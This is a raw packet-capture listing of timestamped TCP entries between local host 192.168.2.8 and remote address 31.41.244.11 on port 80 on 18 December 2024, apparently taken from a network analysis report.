                                                                                                                                                                                          Dec 18, 2024 09:07:31.213488102 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.214406013 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.214541912 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.214596033 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.215353012 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.215478897 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.215480089 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.216362953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.216418982 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.216506958 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.217410088 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.217459917 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.217531919 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.217576981 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.218409061 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.218472958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.218543053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.218575954 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.219424009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.219474077 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.219518900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.219552994 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.220403910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.220453024 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.220458984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.221436977 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.221506119 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.221544981 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.222453117 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.222510099 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.222569942 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.222604036 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.223401070 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.223476887 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.361645937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.361665964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.361731052 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.361926079 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.362488985 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.362535000 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.362612009 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.362651110 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.363161087 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.363328934 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.363365889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.364317894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.364357948 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.364397049 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.365233898 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.365274906 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.365313053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.365474939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.366229057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.366251945 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.366267920 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.366283894 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.367182016 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.367221117 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.367289066 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.367327929 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.368213892 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.368252993 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.368315935 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.368354082 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.369256020 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.369297028 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.369350910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.369388103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.370242119 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.370295048 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.370333910 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.370371103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.371258974 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.371357918 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.371401072 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.372266054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.372361898 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.372401953 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.373285055 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.373358965 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.373394966 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.374293089 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.374345064 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.374382973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.374824047 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.375304937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.375348091 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.375380039 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.375524044 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.376352072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.376393080 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.376511097 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.377330065 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.377370119 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.377432108 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.378046989 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.378338099 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.378379107 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.378397942 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.378432035 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.379378080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.379456043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.379472017 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.379487991 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.380589962 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.380713940 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.380748987 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.381370068 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.381467104 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.381500006 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.382630110 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.382690907 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.382745028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.382822037 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.383516073 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.383555889 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.383582115 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.383685112 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.384380102 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.384413958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.384485006 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.384517908 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.385402918 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.385443926 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.385510921 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.386317968 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.386390924 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.386465073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.386487961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.386528969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.387430906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.387481928 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.387639999 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.388472080 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.388513088 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.388601065 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.389478922 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.389523983 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.389586926 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.389626026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.390456915 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.390583038 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.390620947 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.391571045 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.391614914 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.391680956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.391719103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.392574072 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.392672062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.392713070 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.393503904 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.393603086 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.393640041 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.394534111 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.394577026 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.394685984 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.395001888 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.395555973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.395608902 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.395636082 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.395677090 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.396584988 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.396632910 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.396686077 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.396744967 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.397542953 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.397582054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.397685051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.397723913 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.398545980 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.398668051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.398704052 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.399561882 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.399698019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.399734974 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.400615931 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.400656939 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.400724888 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.401582956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.401624918 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.401693106 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.402596951 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.402638912 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.402693033 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.402730942 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.403599024 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.403724909 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.403763056 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.404635906 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.404675961 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.404716969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.405632973 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.405672073 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.405814886 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.406637907 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.406676054 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.406826019 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.407483101 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.407665968 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.407767057 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.407807112 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.408658028 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.408790112 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.408826113 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.409676075 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.409847021 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.409887075 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.410695076 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.410732985 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.410773993 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.411017895 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.411730051 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.411833048 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.411873102 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.412728071 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.412838936 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.412880898 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.413783073 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.413800955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.413825035 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.413841009 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553113937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553177118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553200006 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553250074 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553431034 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553498030 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553648949 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.553816080 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.554416895 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.554456949 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.554482937 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.554519892 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.555485964 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.555531025 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.556066990 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.556339979 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.556555986 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.556567907 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.556613922 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.557610989 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.557621956 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.557662010 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.558665991 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.559343100 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.559392929 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.559783936 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.559794903 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.559837103 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.560818911 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.560830116 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.560868979 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.560902119 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.561479092 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.561521053 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.561563969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.562556982 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.562597036 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.562642097 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.563648939 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.563688040 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.563729048 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.564933062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.564989090 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.565103054 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.565256119 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.565656900 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.565696955 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.565738916 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.566566944 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.566709042 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.566752911 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.567631006 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.567708969 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.567785025 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.568764925 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.568802118 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.568864107 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.568980932 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.569819927 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.569830894 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.569876909 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.570880890 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.570892096 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.570930958 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.571595907 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.571897030 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.571939945 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.572679043 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.572731018 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.572789907 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.573641062 CET804972031.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:31.573683977 CET4972080192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:31.574057102 CET804972031.41.244.11192.168.2.8
